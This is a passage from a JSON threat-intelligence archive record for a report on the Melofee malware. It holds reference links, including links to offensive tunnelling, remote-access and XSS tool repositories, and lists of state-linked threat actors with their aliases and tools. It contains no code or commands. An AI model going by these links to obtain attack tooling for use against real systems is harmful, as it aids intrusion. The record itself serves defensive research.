↩︎\r\n7. https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a ↩︎ ↩︎\r\n8. https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan ↩︎\r\n9. https://github.com/XZB-1248/Spark ↩︎\r\n10. https://github.com/ph4ntonn/Stowaway ↩︎\r\n11. https://github.com/ssl/ezXSS ↩︎\r\n12. http://rootkiter.com/EarthWorm/ ↩︎\r\n13. https://github.com/fgssfgss/socks_proxy ↩︎\r\n14. https://blog.csdn.net/weixin_29100927/article/details/116577862 ↩︎\r\nhttps://blog.exatrack.com/melofee/\r\nPage 18 of 19\n\nSource: https://blog.exatrack.com/melofee/\r\nhttps://blog.exatrack.com/melofee/\r\nPage 19 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://blog.exatrack.com/melofee/" ], "report_names": [ "melofee" ], "threat_actors": [ { "id": "5bbced13-72f7-40dc-8c41-dcce75bf885e", "created_at": "2022-10-25T15:50:23.695735Z", "updated_at": "2026-04-10T02:00:05.335976Z", "deleted_at": null, "main_name": "Winnti Group", "aliases": [ "Winnti Group" ], "source_name": "MITRE:Winnti Group", "tools": [ "PipeMon", "Winnti for Windows", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "873919c0-bc6a-4c19-b18d-c107e4aa3d20", "created_at": "2023-01-06T13:46:39.138138Z", "updated_at": "2026-04-10T02:00:03.227223Z", "deleted_at": null, "main_name": "Higaisa", "aliases": [], "source_name": "MISPGALAXY:Higaisa", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6a0effeb-3ee2-4a67-9a9f-ef5c330b1c3a", "created_at": "2023-09-07T02:02:47.827633Z", "updated_at": "2026-04-10T02:00:04.873323Z", "deleted_at": null, "main_name": "RedHotel", "aliases": [ "Operation FishMedley", "RedHotel", "TAG-22" ], "source_name": "ETDA:RedHotel", "tools": [ "Agentemis", "BIOPASS", "BIOPASS RAT", "BleDoor", "Brute Ratel", "Brute Ratel C4", "Cobalt Strike", "CobaltStrike", "FunnySwitch", "POISONPLUG.SHADOW", "RbDoor", "RibDoor", "RouterGod", "ShadowPad Winnti", "SprySOCKS", "Spyder", "Winnti", "XShellGhost", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "452d2d74-e812-45d6-b0fe-b8a6cc4ebd01", "created_at": "2022-10-25T16:07:23.562676Z", "updated_at": "2026-04-10T02:00:04.662064Z", "deleted_at": null, "main_name": "Earth Berberoka", "aliases": [ "GamblingPuppet" ], "source_name": "ETDA:Earth Berberoka", "tools": [ "Agent.dhwf", "AngryRebel", "AsyncRAT", "CinaRAT", "Destroy RAT", "DestroyRAT", "Farfli", "Gh0st RAT", "Ghost RAT", "Kaba", "Korplug", "Moudour", "Mydoor", "PCRat", "PlugX", "PuppetLoader", "Quasar RAT", "QuasarRAT", "RedDelta", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Trochilus RAT", "Xamtrav", "Yggdrasil", "oRAT" ], "source_id": "ETDA", "reports": null }, { "id": "30c9c492-afc6-4aa1-8fe6-cecffed946e0", "created_at": "2022-10-25T15:50:23.400822Z", "updated_at": "2026-04-10T02:00:05.350302Z", "deleted_at": null, "main_name": "Higaisa", "aliases": [ "Higaisa" ], "source_name": "MITRE:Higaisa", "tools": [ "PlugX", "certutil", "gh0st RAT" ], "source_id": "MITRE", "reports": null }, { "id": "c7d9878a-e691-4c6f-81ae-84fb115a1345", "created_at": "2022-10-25T16:07:23.359506Z", "updated_at": "2026-04-10T02:00:04.556639Z", "deleted_at": null, "main_name": "APT 41", "aliases": [ "BrazenBamboo", "Bronze Atlas", "Double Dragon", "Earth Baku", "G0096", "Grayfly", "Operation ColunmTK", "Operation CuckooBees", "Operation ShadowHammer", "Red Kelpie", "SparklingGoblin", "TA415", "TG-2633" ], "source_name": "ETDA:APT 41", "tools": [ "9002 RAT", "ADORE.XSEC", "ASPXSpy", "ASPXTool", "AceHash", "Agent.dhwf", "Agentemis", "AndroidControl", "AngryRebel", "AntSword", "BLUEBEAM", "Barlaiy", "BlackCoffee", "Bladabindi", "BleDoor", "CCleaner Backdoor", "CHINACHOPPER", "COLDJAVA", "China Chopper", "ChyNode", "Cobalt Strike", "CobaltStrike", "Crackshot", "CrossWalk", "CurveLast", "CurveLoad", "DAYJOB", "DBoxAgent", "DEADEYE", "DEADEYE.APPEND", "DEADEYE.EMBED", "DEPLOYLOG", "DIRTCLEANER", "DUSTTRAP", "Derusbi", "Destroy RAT", "DestroyRAT", "DodgeBox", "DragonEgg", "ELFSHELF", "EasyNight", "Farfli", "FunnySwitch", "Gh0st RAT", "Ghost RAT", "HDD Rootkit", "HDRoot", "HKDOOR", "HOMEUNIX", "HUI Loader", "HidraQ", "HighNoon", "HighNote", "Homux", "Hydraq", "Jorik", "Jumpall", "KEYPLUG", "Kaba", "Korplug", "LATELUNCH", "LOLBAS", "LOLBins", "LightSpy", "Living off the Land", "Lowkey", "McRAT", "MdmBot", "MessageTap", "Meterpreter", "Mimikatz", "MoonBounce", "MoonWalk", "Motnug", "Moudour", "Mydoor", "NTDSDump", "PACMAN", "PCRat", "PINEGROVE", "PNGRAT", "POISONPLUG", "POISONPLUG.SHADOW", "POTROAST", "PRIVATELOG", "PipeMon", "PlugX", "PortReuse", "ProxIP", "ROCKBOOT", "RbDoor", "RedDelta", "RedXOR", "RibDoor", "Roarur", "RouterGod", "SAGEHIRE", "SPARKLOG", "SQLULDR2", "STASHLOG", "SWEETCANDLE", "ScrambleCross", "Sensocode", "SerialVlogger", "ShadowHammer", "ShadowPad Winnti", "SinoChopper", "Skip-2.0", "SneakCross", "Sogu", "Speculoos", "Spyder", "StealthReacher", "StealthVector", "TERA", "TIDYELF", "TIGERPLUG", "TOMMYGUN", "TVT", "Thoper", "Voldemort", "WIDETONE", "WINNKIT", "WINTERLOVE", "Winnti", "WyrmSpy", "X-Door", "XDOOR", "XMRig", "XShellGhost", "Xamtrav", "ZXShell", "ZoxPNG", "certutil", "certutil.exe", "cobeacon", "gresim", "njRAT", "pwdump", "xDll" ], "source_id": "ETDA", "reports": null }, { "id": "c0cedde3-5a9b-430f-9b77-e6568307205e", "created_at": "2022-10-25T16:07:23.528994Z", "updated_at": "2026-04-10T02:00:04.642473Z", "deleted_at": null, "main_name": "DarkHotel", "aliases": [ "APT-C-06", "ATK 52", "CTG-1948", "Dubnium", "Fallout Team", "G0012", "G0126", "Higaisa", "Luder", "Operation DarkHotel", "Operation Daybreak", "Operation Inexsmar", "Operation PowerFall", "Operation The Gh0st Remains the Same", "Purple Pygmy", "SIG25", "Shadow Crane", "T-APT-02", "TieOnJoe", "Tungsten Bridge", "Zigzag Hail" ], "source_name": "ETDA:DarkHotel", "tools": [ "Asruex", "DarkHotel", "DmaUp3.exe", "GreezeBackdoor", "Karba", "Nemain", "Nemim", "Ramsay", "Retro", "Tapaoux", "Trojan.Win32.Karba.e", "Virus.Win32.Pioneer.dx", "igfxext.exe", "msieckc.exe" ], "source_id": "ETDA", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "945a572f-ebe3-4e2f-a288-512fe751cfa8", "created_at": "2022-10-25T16:07:24.413971Z", "updated_at": "2026-04-10T02:00:04.97924Z", "deleted_at": null, "main_name": "Winnti Group", "aliases": [ "G0044", "Leopard Typhoon", "Wicked Panda", "Winnti Group" ], "source_name": "ETDA:Winnti Group", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "FunnySwitch", "RbDoor", "RibDoor", "RouterGod", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "2664d6f5-f918-4978-87f8-f6afad7402c6", "created_at": "2023-01-06T13:46:39.393669Z", "updated_at": "2026-04-10T02:00:03.312065Z", "deleted_at": null, "main_name": "Earth Berberoka", "aliases": [ "GamblingPuppet" ], "source_name": "MISPGALAXY:Earth Berberoka", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434391, "ts_updated_at": 1775826768, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/fde68c48764877cbd2d667deaa47f7d00e42a691.pdf", "text": "https://archive.orkl.eu/fde68c48764877cbd2d667deaa47f7d00e42a691.txt", "img": "https://archive.orkl.eu/fde68c48764877cbd2d667deaa47f7d00e42a691.jpg" } }